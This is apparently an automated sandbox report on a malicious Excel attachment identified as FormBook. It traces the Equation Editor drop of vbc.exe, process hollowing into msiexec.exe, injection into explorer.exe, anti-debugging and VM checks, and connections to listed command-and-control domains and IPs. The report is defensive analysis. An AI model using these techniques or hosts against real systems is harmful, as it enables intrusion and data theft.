Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_0265FB68
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FB50 NtCreateKey,LdrInitializeThunk, 8_2_0265FB50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_0265FBB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265F900 NtReadFile,LdrInitializeThunk, 8_2_0265F900
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265F9F0 NtClose,LdrInitializeThunk, 8_2_0265F9F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_0265FED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FFB4 NtCreateSection,LdrInitializeThunk, 8_2_0265FFB4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_0265FC60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_0265FDC0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FD8C NtDelayExecution,LdrInitializeThunk, 8_2_0265FD8C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02660060 NtQuerySection, 8_2_02660060
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02660078 NtResumeThread, 8_2_02660078
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02660048 NtProtectVirtualMemory, 8_2_02660048
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026610D0 NtOpenProcessToken, 8_2_026610D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02661148 NtOpenThread, 8_2_02661148
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0266010C NtOpenDirectoryObject, 8_2_0266010C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026601D4 NtSetValueKey, 8_2_026601D4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FA50 NtEnumerateValueKey, 8_2_0265FA50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FA20 NtQueryInformationFile, 8_2_0265FA20
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FAD0 NtAllocateVirtualMemory, 8_2_0265FAD0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FAB8 NtQueryValueKey, 8_2_0265FAB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FBE8 NtQueryVirtualMemory, 8_2_0265FBE8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265F8CC NtWaitForSingleObject, 8_2_0265F8CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02661930 NtSetContextThread, 8_2_02661930
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265F938 NtWriteFile, 8_2_0265F938
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FE24 NtWriteVirtualMemory, 8_2_0265FE24
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FEA0 NtReadVirtualMemory, 8_2_0265FEA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FF34 NtQueueApcThread, 8_2_0265FF34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FFFC NtCreateProcessEx, 8_2_0265FFFC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02660C40 NtGetContextThread, 8_2_02660C40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FC48 NtSetInformationFile, 8_2_0265FC48
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FC30 NtOpenProcess, 8_2_0265FC30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FC90 NtUnmapViewOfSection, 8_2_0265FC90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0265FD5C NtEnumerateKey, 8_2_0265FD5C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02661D80 NtSuspendThread, 8_2_02661D80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E85F0 NtCreateFile, 8_2_000E85F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E86A0 NtReadFile, 8_2_000E86A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E8720 NtClose, 8_2_000E8720
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E85EA NtCreateFile, 8_2_000E85EA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00B96A82 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 8_2_00B96A82
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00B96F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 8_2_00B96F06
PE file does not import any functions
Source: Cielert.tmp.4.dr Static PE information: No import functions for PE file found
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe 1EC8F5C2A626D9484AF9532ED48A5B7482FC0DCDAB074D8545AC8E4454C68A89
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Cielert.tmp 8916FF8C659E74F4A3523CDA054E5ED98209F84CB23F28C5857D670D5DC512E2
Source: Joe Sandbox View Dropped File: C:\Users\Public\vbc.exe 1EC8F5C2A626D9484AF9532ED48A5B7482FC0DCDAB074D8545AC8E4454C68A89
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: Cielert.tmp.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Cielert.tmp.4.dr Static PE information: Section .text
Source: RFQ_Order_PO_TAE5203E.xlsx Virustotal: Detection: 35%
Source: RFQ_Order_PO_TAE5203E.xlsx ReversingLabs: Detection: 34%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$RFQ_Order_PO_TAE5203E.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRB36.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/15@3/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Code function: 4_2_00436274 FindResourceA,LoadResource,LockResource, 4_2_00436274
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.560819872.0000000000460000.00000040.00020000.sdmp, vbc.exe, 00000005.00000002.560884485.00000000004EA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.560868156.00000000004D9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.560943288.0000000000750000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.526246673.00000000005C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.561680130.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.525339285.00000000002B0000.00000004.00000001.sdmp, msiexec.exe

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_004258C0 push eax; ret 4_2_004258EE
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044F951 push ecx; iretd 4_2_0044F983
Source: C:\Users\Public\vbc.exe Code function: 4_2_00425CA0 push eax; ret 4_2_00425CBE
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B832 push eax; ret 5_2_0041B838
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_004160CB push edx; ret 5_2_004160CD
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8D6 push ebp; ret 5_2_0041B8F1
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8F3 push ebp; ret 5_2_0041B8F1
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C134 push ebp; ret 5_2_0041B8F1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00407265 push cs; iretd 5_2_0040726E
Source: C:\Users\Public\vbc.exe Code function: 5_2_004152C7 push edx; retf 5_2_004152C8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041537D push ebp; retf 5_2_0041537E
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C5DD push ebp; ret 5_2_0041B8F1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415F76 push ds; iretd 5_2_00415FE3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408783 push ecx; iretd 5_2_00408784
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0266DFA1 push ecx; ret 8_2_0266DFB4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E60CB push edx; ret 8_2_000E60CD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000D7265 push cs; iretd 8_2_000D726E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E52C7 push edx; retf 8_2_000E52C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E537D push ebp; retf 8_2_000E537E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000D8783 push ecx; iretd 8_2_000D8784
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000EB7E5 push eax; ret 8_2_000EB838
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000EB83B push eax; ret 8_2_000EB8A2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000EB832 push eax; ret 8_2_000EB838
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000EB89C push eax; ret 8_2_000EB8A2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000EB8D6 push ebp; ret 8_2_000EB8F1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000E5F76 push ds; iretd 8_2_000E5FE3
PE file contains sections with non-standard names
Source: hnmy[1].exe.2.dr Static PE information: section name: .bdata
Source: vbc.exe.2.dr Static PE information: section name: .bdata
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00436591 GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary, 4_2_00436591
Source: initial sample Static PE information: section name: .text entropy: 7.32148562524

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\Cielert.tmp
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Hooking and other Techniques for Hiding and Protection:

Found hidden mapped module (file has been removed from disk)
Source: C:\Users\Public\vbc.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CIELERT.TMP
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042F0F0 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC, 4_2_0042F0F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041B3B0 IsIconic, 4_2_0041B3B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042F8A0 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA, 4_2_0042F8A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041DCC2 IsIconic,GetWindowPlacement,GetWindowRect, 4_2_0041DCC2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2848 Thread sleep time: -240000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Found large amount of non-executed APIs
Source: C:\Users\Public\vbc.exe API coverage: 4.7 %
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe Code function: 4_2_00437A5E __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 4_2_00437A5E
Source: explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.549935611.000000000456F000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.549824786.00000000044E7000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.546753465.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.550067017.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00436591 GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary, 4_2_00436591
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_004465D8 mov eax, dword ptr fs:[00000030h] 4_2_004465D8
Source: C:\Users\Public\vbc.exe Code function: 4_2_004465E8 mov eax, dword ptr fs:[00000030h] 4_2_004465E8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446608 mov eax, dword ptr fs:[00000030h] 4_2_00446608
Source: C:\Users\Public\vbc.exe Code function: 4_2_004466A8 mov eax, dword ptr fs:[00000030h] 4_2_004466A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00446978 mov eax, dword ptr fs:[00000030h] 4_2_00446978
Source: C:\Users\Public\vbc.exe Code function: 4_2_00441E58 mov ecx, dword ptr fs:[00000030h] 4_2_00441E58
Source: C:\Users\Public\vbc.exe Code function: 5_2_007726F8 mov eax, dword ptr fs:[00000030h] 5_2_007726F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_026726F8 mov eax, dword ptr fs:[00000030h] 8_2_026726F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B50 LdrLoadDll, 5_2_00409B50
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A3B6 SetUnhandledExceptionFilter, 4_2_0042A3B6
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A3C8 SetUnhandledExceptionFilter, 4_2_0042A3C8

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 163.197.71.43 80
Source: C:\Windows\explorer.exe Domain query: www.mediafyagency.com
Source: C:\Windows\explorer.exe Network Connect: 64.190.62.111 80
Source: C:\Windows\explorer.exe Domain query: www.aloebiotics.com
Source: C:\Windows\explorer.exe Domain query: www.sjljtzsls.com
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: CA0000
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: C:\Users\user\AppData\Local\Temp\Cielert.tmp target: C:\Users\Public\vbc.exe protection: readonly
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\msiexec.exe Thread register set: target process: 1764
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: explorer.exe, 00000006.00000000.536218845.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.547008942.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.603495543.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528059853.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.536218845.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.547008942.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.603495543.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528059853.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.536218845.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.547008942.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.603495543.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528059853.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A855 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 4_2_0042A855
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043B3F9 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA, 4_2_0043B3F9

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED

Remote Access Functionality:

Yara detected FormBook